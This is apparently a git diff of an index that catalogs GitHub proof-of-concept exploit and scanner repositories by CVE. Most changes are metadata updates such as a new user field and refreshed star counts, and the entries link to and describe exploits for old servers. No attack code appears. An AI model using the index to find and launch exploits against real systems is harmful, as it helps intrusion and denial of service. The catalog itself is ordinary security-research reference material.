2024/CVE-2024-45383.json | 3 +- 2024/CVE-2024-45409.json | 3 +- 2024/CVE-2024-45410.json | 3 +- 2024/CVE-2024-45507.json | 3 +- 2024/CVE-2024-45519.json | 9 +- 2024/CVE-2024-45589.json | 3 +- 2024/CVE-2024-45614.json | 3 +- 2024/CVE-2024-4577.json | 159 +++-- 2024/CVE-2024-46209.json | 3 +- 2024/CVE-2024-46256.json | 3 +- 2024/CVE-2024-46278.json | 3 +- 2024/CVE-2024-46310.json | 3 +- 2024/CVE-2024-46377.json | 3 +- 2024/CVE-2024-46451.json | 3 +- 2024/CVE-2024-46532.json | 3 +- 2024/CVE-2024-46627.json | 3 +- 2024/CVE-2024-46635.json | 3 +- 2024/CVE-2024-46658.json | 3 +- 2024/CVE-2024-46901.json | 3 +- 2024/CVE-2024-46986.json | 3 +- 2024/CVE-2024-4701.json | 3 +- 2024/CVE-2024-47066.json | 3 +- 2024/CVE-2024-47076.json | 3 +- 2024/CVE-2024-47176.json | 52 +- 2024/CVE-2024-47177.json | 3 +- 2024/CVE-2024-4761.json | 3 +- 2024/CVE-2024-4875.json | 3 +- 2024/CVE-2024-4879.json | 30 +- 2024/CVE-2024-4883.json | 3 +- 2024/CVE-2024-4885.json | 3 +- 2024/CVE-2024-4898.json | 6 +- 2024/CVE-2024-4956.json | 48 +- 2024/CVE-2024-5009.json | 6 +- 2024/CVE-2024-5057.json | 3 +- 2024/CVE-2024-5084.json | 12 +- 2024/CVE-2024-5246.json | 3 +- 2024/CVE-2024-5274.json | 6 +- 2024/CVE-2024-5324.json | 3 +- 2024/CVE-2024-5326.json | 6 +- 2024/CVE-2024-5356.json | 3 +- 2024/CVE-2024-5420.json | 6 +- 2024/CVE-2024-5522.json | 9 +- 2024/CVE-2024-5633.json | 3 +- 2024/CVE-2024-5735.json | 3 +- 2024/CVE-2024-5736.json | 3 +- 2024/CVE-2024-5737.json | 3 +- 2024/CVE-2024-5806.json | 3 +- 2024/CVE-2024-5932.json | 9 +- 2024/CVE-2024-5947.json | 3 +- 2024/CVE-2024-5961.json | 3 +- 2024/CVE-2024-6028.json | 3 +- 2024/CVE-2024-6043.json | 3 +- 2024/CVE-2024-6050.json | 3 +- 2024/CVE-2024-6095.json | 3 +- 2024/CVE-2024-6205.json | 3 +- 2024/CVE-2024-6222.json | 3 +- 2024/CVE-2024-6366.json | 3 +- 2024/CVE-2024-6386.json | 3 +- 2024/CVE-2024-6387.json | 273 ++++++--- 2024/CVE-2024-6529.json | 3 +- 2024/CVE-2024-6536.json | 3 +- 2024/CVE-2024-6592.json | 3 +- 2024/CVE-2024-6624.json | 3 +- 2024/CVE-2024-6670.json | 3 +- 2024/CVE-2024-6768.json | 3 +- 2024/CVE-2024-6769.json | 3 +- 2024/CVE-2024-6778.json | 11 +- 2024/CVE-2024-6782.json | 9 +- 2024/CVE-2024-7029.json | 9 +- 2024/CVE-2024-7094.json | 3 +- 2024/CVE-2024-7120.json | 3 +- 2024/CVE-2024-7135.json | 3 +- 2024/CVE-2024-7313.json | 3 +- 2024/CVE-2024-7339.json | 3 +- 2024/CVE-2024-7479.json | 3 +- 2024/CVE-2024-7514.json | 3 +- 2024/CVE-2024-7593.json | 9 +- 2024/CVE-2024-7646.json | 6 +- 2024/CVE-2024-7703.json | 3 +- 2024/CVE-2024-7854.json | 3 +- 2024/CVE-2024-7856.json | 3 +- 2024/CVE-2024-7928.json | 12 +- 2024/CVE-2024-7954.json | 15 +- 2024/CVE-2024-7965.json | 3 +- 2024/CVE-2024-8190.json | 3 +- 2024/CVE-2024-8275.json | 3 +- 2024/CVE-2024-8277.json | 3 +- 2024/CVE-2024-8349.json | 3 +- 2024/CVE-2024-8353.json | 3 +- 2024/CVE-2024-8484.json | 3 +- 2024/CVE-2024-8504.json | 6 +- 2024/CVE-2024-8517.json | 3 +- 2024/CVE-2024-8522.json | 3 +- 2024/CVE-2024-8698.json | 3 +- 2024/CVE-2024-8752.json | 3 +- 2024/CVE-2024-8949.json | 3 +- 2024/CVE-2024-9014.json | 3 +- 2024/CVE-2024-9106.json | 3 +- 2024/CVE-2024-9166.json | 3 +- 2024/CVE-2024-9224.json | 3 +- 2024/CVE-2024-9234.json | 33 + 2024/CVE-2024-9441.json | 6 +- 2024/CVE-2024-9464.json | 7 +- 2024/CVE-2024-9465.json | 6 +- 2024/CVE-2024-9570.json | 3 +- 2024/CVE-2024-9680.json | 33 + 2024/CVE-2024-9821.json | 3 +- README.md | 19 +- 5805 files changed, 28080 insertions(+), 14117 deletions(-) delete mode 100644 2021/CVE-2021-38304.json create mode 100644 2024/CVE-2024-9234.json create mode 100644 2024/CVE-2024-9680.json diff --git a/1999/CVE-1999-0016.json b/1999/CVE-1999-0016.json index f353b113a7..1de853b3f7 100644 --- a/1999/CVE-1999-0016.json +++ b/1999/CVE-1999-0016.json @@ -7,7 +7,8 @@ "login": "pexmee", "id": 60260590, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60260590?v=4", - "html_url": "https:\/\/github.com\/pexmee" + "html_url": "https:\/\/github.com\/pexmee", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pexmee\/CVE-1999-0016-Land-DOS-tool", "description": "A simple dos-tool ", @@ -37,7 +38,8 @@ "login": "Pommaq", "id": 42520348, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42520348?v=4", - "html_url": "https:\/\/github.com\/Pommaq" + "html_url": "https:\/\/github.com\/Pommaq", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Pommaq\/CVE-1999-0016-POC", "description": null, diff --git a/1999/CVE-1999-0532.json b/1999/CVE-1999-0532.json index ce6a1379cd..27a31c2680 100644 --- a/1999/CVE-1999-0532.json +++ b/1999/CVE-1999-0532.json @@ -7,7 +7,8 @@ "login": "websecnl", "id": 20278695, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20278695?v=4", - "html_url": "https:\/\/github.com\/websecnl" + "html_url": "https:\/\/github.com\/websecnl", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/websecnl\/Bulk_CVE-1999-0532_Scanner", "description": "A tool i made for use in combination with hackerone.com for Bounty Hacking purposes.", @@ -37,7 +38,8 @@ "login": "Rodney-O-C-Melby", "id": 16503898, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16503898?v=4", - "html_url": "https:\/\/github.com\/Rodney-O-C-Melby" + "html_url": "https:\/\/github.com\/Rodney-O-C-Melby", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Rodney-O-C-Melby\/dns-zone-transfer-test", "description": "Automates Domain Name System (DNS) zone transfer testing. Checks for CVE-1999-0532 by automatically finding a given domains nameservers, and tests for zone transfers, if successful, subdomains are printed to standard output.", diff --git a/1999/CVE-1999-1053.json b/1999/CVE-1999-1053.json index a3cc941360..c499141691 100644 --- a/1999/CVE-1999-1053.json +++ b/1999/CVE-1999-1053.json @@ -7,7 +7,8 @@ "login": "siunam321", "id": 104430134, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104430134?v=4", - "html_url": "https:\/\/github.com\/siunam321" + "html_url": "https:\/\/github.com\/siunam321", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/siunam321\/CVE-1999-1053-PoC", "description": "CVE-1999-1053 Proof-of-Concept Exploit", diff --git a/2000/CVE-2000-0114.json b/2000/CVE-2000-0114.json index 3319ff6273..79bfb5790d 100644 --- a/2000/CVE-2000-0114.json +++ b/2000/CVE-2000-0114.json @@ -7,7 +7,8 @@ "login": "Cappricio-Securities", "id": 102907425, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", - "html_url": "https:\/\/github.com\/Cappricio-Securities" + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2000-0114", "description": "Microsoft FrontPage Extensions Check (shtml.dll)", @@ -48,7 +49,8 @@ "login": "Josekutty-K", "id": 155238968, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155238968?v=4", - "html_url": "https:\/\/github.com\/Josekutty-K" + "html_url": "https:\/\/github.com\/Josekutty-K", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Josekutty-K\/frontpage-server-extensions-vulnerability-scanner", "description": "Python script to scan for CVE-2000-0114 vulnerability in Frontpage Server Extensions. Automates subdomain enumeration and vulnerability scanning using subfinder and nuclei. For educational and professional use in cybersecurity assessments.", @@ -78,7 +80,8 @@ "login": "adhamelhansye", "id": 145185592, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145185592?v=4", - "html_url": "https:\/\/github.com\/adhamelhansye" + "html_url": "https:\/\/github.com\/adhamelhansye", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/adhamelhansye\/CVE-2000-0114", "description": "This a CVE I found it in VDP at hackerone Platform", diff --git a/2000/CVE-2000-0170.json b/2000/CVE-2000-0170.json index 05f3bcfd24..035b90c0b8 100644 --- a/2000/CVE-2000-0170.json +++ b/2000/CVE-2000-0170.json @@ -7,7 +7,8 @@ "login": "mike182", "id": 509504, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/509504?v=4", - "html_url": "https:\/\/github.com\/mike182" + "html_url": "https:\/\/github.com\/mike182", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mike182\/exploit", "description": "CVE-2000-0170", diff --git a/2000/CVE-2000-0649.json b/2000/CVE-2000-0649.json index 2ee5be7f50..407cab5305 100644 --- a/2000/CVE-2000-0649.json +++ b/2000/CVE-2000-0649.json @@ -7,7 +7,8 @@ "login": "rafaelh", "id": 3272113, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3272113?v=4", - "html_url": "https:\/\/github.com\/rafaelh" + "html_url": "https:\/\/github.com\/rafaelh", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/rafaelh\/CVE-2000-0649", "description": "Test for CVE-2000-0649, and return an IP address if vulnerable", @@ -42,7 +43,8 @@ "login": "stevenvegar", "id": 70730301, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70730301?v=4", - "html_url": "https:\/\/github.com\/stevenvegar" + "html_url": "https:\/\/github.com\/stevenvegar", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/stevenvegar\/cve-2000-0649", "description": "Script fo testing CVE-2000-0649 for Apache and MS IIS servers", @@ -72,7 +74,8 @@ "login": "Downgraderz", "id": 19348425, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19348425?v=4", - "html_url": "https:\/\/github.com\/Downgraderz" + "html_url": "https:\/\/github.com\/Downgraderz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Downgraderz\/PoC-CVE-2000-0649", "description": "A small tool to create a PoC for CVE-2000-0649.", diff --git a/2000/CVE-2000-0979.json b/2000/CVE-2000-0979.json index 14b2496fdb..d6e2ae30ba 100644 --- a/2000/CVE-2000-0979.json +++ b/2000/CVE-2000-0979.json @@ -7,7 +7,8 @@ "login": "Z6543", "id": 1755029, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1755029?v=4", - "html_url": "https:\/\/github.com\/Z6543" + "html_url": "https:\/\/github.com\/Z6543", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Z6543\/CVE-2000-0979", "description": "CVE-2000-0979", diff --git a/2001/CVE-2001-0550.json b/2001/CVE-2001-0550.json index 0170bfa9c0..3a4879e7eb 100644 --- a/2001/CVE-2001-0550.json +++ b/2001/CVE-2001-0550.json @@ -7,7 +7,8 @@ "login": "gilberto47831", "id": 60636483, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60636483?v=4", - "html_url": "https:\/\/github.com\/gilberto47831" + "html_url": "https:\/\/github.com\/gilberto47831", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gilberto47831\/Network-Filesystem-Forensics", "description": "Reports on post-exploitation on honeypot exploiting vulnerable wu-ftpd (CVE-2001-0550)", diff --git a/2001/CVE-2001-0680.json b/2001/CVE-2001-0680.json index 39dc074bae..7c0cd0e419 100644 --- a/2001/CVE-2001-0680.json +++ b/2001/CVE-2001-0680.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2001-0680", "description": "Directory traversal vulnerability in ftpd in QPC QVT\/Net 4.0 and AVT\/Term 5.0", diff --git a/2001/CVE-2001-0758.json b/2001/CVE-2001-0758.json index e5161669ea..5004abd826 100644 --- a/2001/CVE-2001-0758.json +++ b/2001/CVE-2001-0758.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2001-0758", "description": "Directory traversal vulnerability in Shambala 4.5 ", diff --git a/2001/CVE-2001-0931.json b/2001/CVE-2001-0931.json index ce3b17aa7b..f822b5d498 100644 --- a/2001/CVE-2001-0931.json +++ b/2001/CVE-2001-0931.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2001-0931", "description": "Directory traversal vulnerability in Cooolsoft PowerFTP Server 2.03 allows attackers to list or read arbitrary files and directories via a .. (dot dot) in (1) LS or (2) GET.", diff --git a/2001/CVE-2001-0932.json b/2001/CVE-2001-0932.json index 0c0ae0252e..3fdee76720 100644 --- a/2001/CVE-2001-0932.json +++ b/2001/CVE-2001-0932.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2001-0932", "description": "Cooolsoft PowerFTP Server 2.0 3\/2.10 - Multiple Denial of Service Vulnerabilities", diff --git a/2001/CVE-2001-0933.json b/2001/CVE-2001-0933.json index b54ff74fb7..e33d5a1f97 100644 --- a/2001/CVE-2001-0933.json +++ b/2001/CVE-2001-0933.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2001-0933", "description": "Cooolsoft PowerFTP Server 2.03 allows remote attackers to list the contents of arbitrary drives via a ls (LIST) command that includes the drive letter as an argument, e.g. \"ls C:\".", diff --git a/2001/CVE-2001-0934.json b/2001/CVE-2001-0934.json index 1a81f32e34..46e8846c13 100644 --- a/2001/CVE-2001-0934.json +++ b/2001/CVE-2001-0934.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2001-0934", "description": "Cooolsoft PowerFTP Server 2.03 allows remote attackers to obtain the physical path of the server root via the pwd command, which lists the full pathname.", diff --git a/2001/CVE-2001-1442.json b/2001/CVE-2001-1442.json index 498d680aca..fe3ba3f4a3 100644 --- a/2001/CVE-2001-1442.json +++ b/2001/CVE-2001-1442.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2001-1442", "description": "ISC INN 2.x - Command-Line Buffer Overflow", diff --git a/2001/CVE-2001-1473.json b/2001/CVE-2001-1473.json index 96f447edb2..d02af1c9f0 100644 --- a/2001/CVE-2001-1473.json +++ b/2001/CVE-2001-1473.json @@ -7,7 +7,8 @@ "login": "p1ton3rr", "id": 184847683, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184847683?v=4", - "html_url": "https:\/\/github.com\/p1ton3rr" + "html_url": "https:\/\/github.com\/p1ton3rr", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/p1ton3rr\/poc-cve-2001-1473", "description": "A novel approach to the old problem", diff --git a/2001/CVE-2001-3389.json b/2001/CVE-2001-3389.json index a652496196..aeb8a27461 100644 --- a/2001/CVE-2001-3389.json +++ b/2001/CVE-2001-3389.json @@ -7,7 +7,8 @@ "login": "becrevex", "id": 8326868, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8326868?v=4", - "html_url": "https:\/\/github.com\/becrevex" + "html_url": "https:\/\/github.com\/becrevex", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/becrevex\/Gaston", "description": "BEAST (CVE-2001-3389) Checker", diff --git a/2002/CVE-2002-0200.json b/2002/CVE-2002-0200.json index 3a46b2b75d..e8bfa81c69 100644 --- a/2002/CVE-2002-0200.json +++ b/2002/CVE-2002-0200.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0200", "description": "Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name.", diff --git a/2002/CVE-2002-0201.json b/2002/CVE-2002-0201.json index 03450fb116..065c326370 100644 --- a/2002/CVE-2002-0201.json +++ b/2002/CVE-2002-0201.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0201", "description": "Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow.", diff --git a/2002/CVE-2002-0288.json b/2002/CVE-2002-0288.json index d2ec8f812e..52692b614f 100644 --- a/2002/CVE-2002-0288.json +++ b/2002/CVE-2002-0288.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0288", "description": "Phusion WebServer 1.0 - Directory Traversal", diff --git a/2002/CVE-2002-0289.json b/2002/CVE-2002-0289.json index d5b563cfc0..1941be84ed 100644 --- a/2002/CVE-2002-0289.json +++ b/2002/CVE-2002-0289.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0289", "description": "Phusion WebServer 1.0 - 'URL' Remote Buffer Overflow", diff --git a/2002/CVE-2002-0346.json b/2002/CVE-2002-0346.json index 6dee8a9bab..bf44f2214d 100644 --- a/2002/CVE-2002-0346.json +++ b/2002/CVE-2002-0346.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0346", "description": "Cross-site scripting vulnerability in Cobalt RAQ 4 allows remote attackers to execute arbitrary script as other Cobalt users via Javascript in a URL to (1) service.cgi or (2) alert.cgi.", diff --git a/2002/CVE-2002-0347.json b/2002/CVE-2002-0347.json index bb01cf375d..384d6b069a 100644 --- a/2002/CVE-2002-0347.json +++ b/2002/CVE-2002-0347.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0347", "description": "Directory traversal vulnerability in Cobalt RAQ 4 allows remote attackers to read password-protected files, and possibly files outside the web root, via a .. (dot dot) in an HTTP request.", diff --git a/2002/CVE-2002-0348.json b/2002/CVE-2002-0348.json index 4f4ca9b7d6..4422205075 100644 --- a/2002/CVE-2002-0348.json +++ b/2002/CVE-2002-0348.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0348", "description": "service.cgi in Cobalt RAQ 4 allows remote attackers to cause a denial of service", diff --git a/2002/CVE-2002-0448.json b/2002/CVE-2002-0448.json index b471786442..9b0121dc43 100644 --- a/2002/CVE-2002-0448.json +++ b/2002/CVE-2002-0448.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0448", "description": "Xerver 2.10 - Multiple Request Denial of Service Vulnerabilities", diff --git a/2002/CVE-2002-0740.json b/2002/CVE-2002-0740.json index 43924cd11a..dfe339b905 100644 --- a/2002/CVE-2002-0740.json +++ b/2002/CVE-2002-0740.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0740", "description": "SLRNPull Spool Directory Command Line Parameter Buffer Overflow Vulnerability", diff --git a/2002/CVE-2002-0748.json b/2002/CVE-2002-0748.json index 834fb47e60..431b3cf801 100644 --- a/2002/CVE-2002-0748.json +++ b/2002/CVE-2002-0748.json @@ -7,7 +7,8 @@ "login": "fauzanwijaya", "id": 139438257, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139438257?v=4", - "html_url": "https:\/\/github.com\/fauzanwijaya" + "html_url": "https:\/\/github.com\/fauzanwijaya", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fauzanwijaya\/CVE-2002-0748", "description": "Proof of concept for LabVIEW Web Server HTTP Get Newline DoS vulnerability", diff --git a/2002/CVE-2002-0991.json b/2002/CVE-2002-0991.json index fdddff51d7..68344efb45 100644 --- a/2002/CVE-2002-0991.json +++ b/2002/CVE-2002-0991.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0991", "description": "Buffer overflows in the cifslogin command for HP CIFS\/9000 Client A.01.06 and earlier", diff --git a/2002/CVE-2002-1614.json b/2002/CVE-2002-1614.json index f94be48dcc..4368bd4907 100644 --- a/2002/CVE-2002-1614.json +++ b/2002/CVE-2002-1614.json @@ -7,7 +7,8 @@ "login": "wlensinas", "id": 17731891, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17731891?v=4", - "html_url": "https:\/\/github.com\/wlensinas" + "html_url": "https:\/\/github.com\/wlensinas", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/wlensinas\/CVE-2002-1614", "description": null, diff --git a/2002/CVE-2002-20001.json b/2002/CVE-2002-20001.json index 969eb7646b..b11a61048e 100644 --- a/2002/CVE-2002-20001.json +++ b/2002/CVE-2002-20001.json @@ -7,16 +7,17 @@ "login": "c0r0n3r", "id": 979146, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/979146?v=4", - "html_url": "https:\/\/github.com\/c0r0n3r" + "html_url": "https:\/\/github.com\/c0r0n3r", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/c0r0n3r\/dheater", "description": "D(HE)ater is a proof of concept implementation of the D(HE)at attack (CVE-2002-20001) through which denial-of-service can be performed by enforcing the Diffie-Hellman key exchange. (read-only clone of the original GitLab project)", "fork": false, "created_at": "2021-08-31T09:51:12Z", - "updated_at": "2024-10-03T06:28:07Z", + "updated_at": "2024-10-17T20:53:33Z", "pushed_at": "2024-05-03T22:24:07Z", - "stargazers_count": 184, - "watchers_count": 184, + "stargazers_count": 185, + "watchers_count": 185, "has_discussions": false, "forks_count": 27, "allow_forking": true, @@ -46,7 +47,7 @@ ], "visibility": "public", "forks": 27, - "watchers": 184, + "watchers": 185, "score": 0, "subscribers_count": 8 } diff --git a/2002/CVE-2002-2420.json b/2002/CVE-2002-2420.json index 508e8cc31f..47e6f5fd39 100644 --- a/2002/CVE-2002-2420.json +++ b/2002/CVE-2002-2420.json @@ -7,7 +7,8 @@ "login": "krdsploit", "id": 104392085, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104392085?v=4", - "html_url": "https:\/\/github.com\/krdsploit" + "html_url": "https:\/\/github.com\/krdsploit", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/krdsploit\/CVE-2002-2420", "description": "The New Exploit there no available on metasploit framework !", diff --git a/2003/CVE-2003-0001.json b/2003/CVE-2003-0001.json index b224fe04f2..f1b871e1fd 100644 --- a/2003/CVE-2003-0001.json +++ b/2003/CVE-2003-0001.json @@ -7,7 +7,8 @@ "login": "marb08", "id": 22150927, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22150927?v=4", - "html_url": "https:\/\/github.com\/marb08" + "html_url": "https:\/\/github.com\/marb08", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/marb08\/etherleak-checker", "description": "This Python script helps to detect the Etherleak (CVE-2003-0001) vulnerability on a target host by analyzing the padding data in network packets. The script uses Scapy to send various types of requests (ICMP, ARP, or TCP) and checks if the responses contain any padding data that could potentially leak sensitive memory contents.", diff --git a/2003/CVE-2003-0172.json b/2003/CVE-2003-0172.json index 55de4ce2dd..15bfd122d9 100644 --- a/2003/CVE-2003-0172.json +++ b/2003/CVE-2003-0172.json @@ -7,7 +7,8 @@ "login": "cyberdesu", "id": 78768764, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78768764?v=4", - "html_url": "https:\/\/github.com\/cyberdesu" + "html_url": "https:\/\/github.com\/cyberdesu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cyberdesu\/Remote-Buffer-overflow-CVE-2003-0172", "description": null, diff --git a/2003/CVE-2003-0201.json b/2003/CVE-2003-0201.json index aa52b55cca..4652386176 100644 --- a/2003/CVE-2003-0201.json +++ b/2003/CVE-2003-0201.json @@ -7,7 +7,8 @@ "login": "KernelPan1k", "id": 3338681, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3338681?v=4", - "html_url": "https:\/\/github.com\/KernelPan1k" + "html_url": "https:\/\/github.com\/KernelPan1k", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/KernelPan1k\/trans2open-CVE-2003-0201", "description": "Samba exploit CVE2003-0201", diff --git a/2003/CVE-2003-0222.json b/2003/CVE-2003-0222.json index 97e093d888..040249748e 100644 --- a/2003/CVE-2003-0222.json +++ b/2003/CVE-2003-0222.json @@ -7,7 +7,8 @@ "login": "phamthanhsang280477", "id": 45278781, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45278781?v=4", - "html_url": "https:\/\/github.com\/phamthanhsang280477" + "html_url": "https:\/\/github.com\/phamthanhsang280477", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/phamthanhsang280477\/CVE-2003-0222", "description": "CVE-2003-0222", diff --git a/2003/CVE-2003-0264.json b/2003/CVE-2003-0264.json index 0ba0b5ac30..46165f5e67 100644 --- a/2003/CVE-2003-0264.json +++ b/2003/CVE-2003-0264.json @@ -7,7 +7,8 @@ "login": "adenkiewicz", "id": 1060275, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1060275?v=4", - "html_url": "https:\/\/github.com\/adenkiewicz" + "html_url": "https:\/\/github.com\/adenkiewicz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/adenkiewicz\/CVE-2003-0264", "description": "Exploit for CVE-2003-0264 based on pwntools and metasploit's windows\/reverse_tcp", @@ -37,7 +38,8 @@ "login": "fyoderxx", "id": 31161670, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31161670?v=4", - "html_url": "https:\/\/github.com\/fyoderxx" + "html_url": 